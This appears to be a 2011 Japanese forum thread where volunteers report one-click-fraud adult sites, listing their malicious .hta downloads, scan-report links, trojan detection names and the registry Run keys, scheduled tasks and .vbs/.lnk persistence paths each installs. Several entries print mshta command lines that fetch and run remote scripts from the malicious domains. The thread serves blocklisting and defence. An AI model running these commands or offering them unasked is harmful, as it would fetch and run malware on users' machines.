File name 「FlvPlayer.hta」 http://r.virscan.org/report/d35ecdf2c8b12cbce04e364e50629a50.html C:\Users\Cerberus\AppData\Roaming\Adobe\WscMgr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [GxWORKS(Oamellia)] "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\Oamellia.lnk" O4 - HKCU\..\Run: [Saourn53508_801900207] "C:\Windows\system32\mshta" http://4cac.flowerdesk.info/skiu/I1o-j0YZxpnkhOpdCg1fCw.htm The link place of "Oamellia.lnk" C:\Users\Cerberus\AppData\Roaming\Adobe\WscMgr.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Adobe\Larimar609cgH.dat" Startup on Registory HKCU:Run GxWORKS(Oamellia) "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\Oamellia.lnk" HKCU:Run Saourn53508_801900207 "C:\Windows\system32\mshta" http://4cac.flowerdesk.info/skiu/I1o-j0YZxpnkhOpdCg1fCw.htm EROSTAR - いぬ 2011/12/22(Thu) 22:01 No.22684 ワンクリウェア入り http://nobnen.info/ File name 「MovieID_huhQBW2yEOwdUXsGEBGEmGW96KCmIiMU.hta」 http://www.virustotal.com/file-scan/report.html?id=538d8b5b01ccfd3c66706a417a7c81f08e4a50f77dba32d873f7ee60416cf193-1324552342 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoothuhQBW2yEOwdUXsGEBGEmGW96KCmIiMU] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWritehuhQBW2yEOwdUXsGEBGEmGW96KCmIiMU] C:\Users\Cerberus\SoftRecovery\RegWriting.lnk The link place of "RegWriting" C:\Windows\System32\mshta.exe http://nobnen.info/set_inf2.php?cccid=huhQBW2yEOwdUXsGEBGEmGW96KCmIiMU The link place of "SystemFile" C:\Users\Cerberus\UserProfile\htmlapp.exe http://nobnen.info/reg2.php?cccid=huhQBW2yEOwdUXsGEBGEmGW96KCmIiMU Startup on Registory HKCU:Run SystemBoothuhQBW2yEOwdUXsGEBGEmGW96KCmIiMU C:\Users\Cerberus\UserProfile\SystemFile.lnk HKCU:Run RegWritehuhQBW2yEOwdUXsGEBGEmGW96KCmIiMU C:\Users\Cerberus\SoftRecovery\RegWriting.lnk Adartokore.Info - いぬ 2011/12/23(Fri) 17:59 No.22686 ワンクリウェア入り http://lates.adartokore.info/ File name 「MovieLoader.hta」 Kaspersky 5.5.10 2011.12.23 2011-12-23 Trojan-Downloader.HTA.Agent.ca http://r.virscan.org/report/74930620bbff202e60943f84cd1040ea.html C:\Users\Cerberus\AppData\Roaming\Adobe\appMgr2.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [meetyngcolumz] "C:\Users\Cerberus\AppData\Roaming\Adobe\columz.lnk" O4 - HKCU\..\Run: [Affjir61109_846091103] "C:\Windows\system32\mshta" http://1748.mountech.info/sojs/4u9fGoibyynzcmuIdaWvqw.htm The link place of "columz.lnk" C:\Users\Cerberus\AppData\Roaming\Adobe\appMgr2.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\lambPIG.cnf" Startup on Registory HKCU:Run meetyngcolumz "C:\Users\Cerberus\AppData\Roaming\Adobe\columz.lnk" HKCU:Run Affjir61109_846091103 "C:\Windows\system32\mshta" http://dedf.mountech.info/au/cfgtr5b2XlBwpbUTbuCaOg.htm Re: JPPorn - 浦野 秀雄 2011/12/23(Fri) 18:33 No.22687 それぞれリストに入れました

エリアーヌ 投稿者：いぬ 投稿日：2011/12/18(Sun) 20:19 No.22666    ワンクリウェア入り http://windowpane.twittnow.net/ http://twittnow.net/ http://*.twittnow.net/ File name 「nudybeach_1324202638.hta」 http://www.virustotal.com/file-scan/report.html?id=20841ce8a2a2e4401bafb99199aab9b87741bebc72e959daccb22d8bdeb0ae14-1324202296 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [thanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587] C:\Users\Cerberus\AppData\Roaming\Microsoft hanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587.vbs Startup on Registory HKCU:Run thanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587 C:\Users\Cerberus\AppData\Roaming\Microsoft hanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft hanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587.vbs</Command> ADULT - いぬ 2011/12/19(Mon) 20:44 No.22668 ワンクリウェア入り http://www.snake-movies.com/ File name 「7e97.hta」 http://www.virustotal.com/file-scan/report.html?id=0a91b8b91f7a9f0a47adbf4556a9c4ce88f7de35f0ebb741ec63e295536dfcd3-1324283308 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.high-quality-movie.com] mshta http://www.snake-movies.com/regist2.php WMV - いぬ 2011/12/19(Mon) 20:49 No.22670 ワンクリウェア入り http://apoplexy.saladinemily.net/ http://saladinemily.net/ http://*.saladinemily.net/ File name 「pinkylove_1324291498.hta」 Kaspersky 9.0.0.837 2011.12.19 Trojan-Downloader.HTA.Agent.bu http://www.virustotal.com/file-scan/report.html?id=bae91572aa98af01ed653d80847a021bcb6a942d24876541a7b63ca270240ec3-1324291027 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4.vbs Startup on Registory HKCU:Run placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Media</Command> <Arguments>Center Programs\placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4.vbs</Arguments> Avstyle - いぬ 2011/12/19(Mon) 20:51 No.22671 ワンクリウェア入り http://mung.adultsandy.net/ http://adultsandy.net/ http://*.adultsandy.net/ File name 「kunnyfever_1324292927.hta」 Kaspersky 9.0.0.837 2011.12.19 Trojan-Downloader.HTA.Agent.bu http://www.virustotal.com/file-scan/report.html?id=936246b1d3adfc14c005e7c8800ba16accc941e1529b9ff11fcdc95f7a4aa167-1324292462 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [tykutyuku_9c346094ea1cbc0cd1dbace069363a98fbc173dc25844aed] C:\Users\Cerberus\AppData\Roaming\Identities ykutyuku_9c346094ea1cbc0cd1dbace069363a98fbc173dc25844aed.vbs Startup on Registory HKCU:Run tykutyuku_9c346094ea1cbc0cd1dbace069363a98fbc173dc25844aed C:\Users\Cerberus\AppData\Roaming\Identities ykutyuku_9c346094ea1cbc0cd1dbace069363a98fbc173dc25844aed.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Identities ykutyuku_9c346094ea1cbc0cd1dbace069363a98fbc173dc25844aed.vbs</Command> Re: エリアーヌ - 浦野 秀雄 2011/12/20(Tue) 19:48 No.22674 それぞれリストに入れました。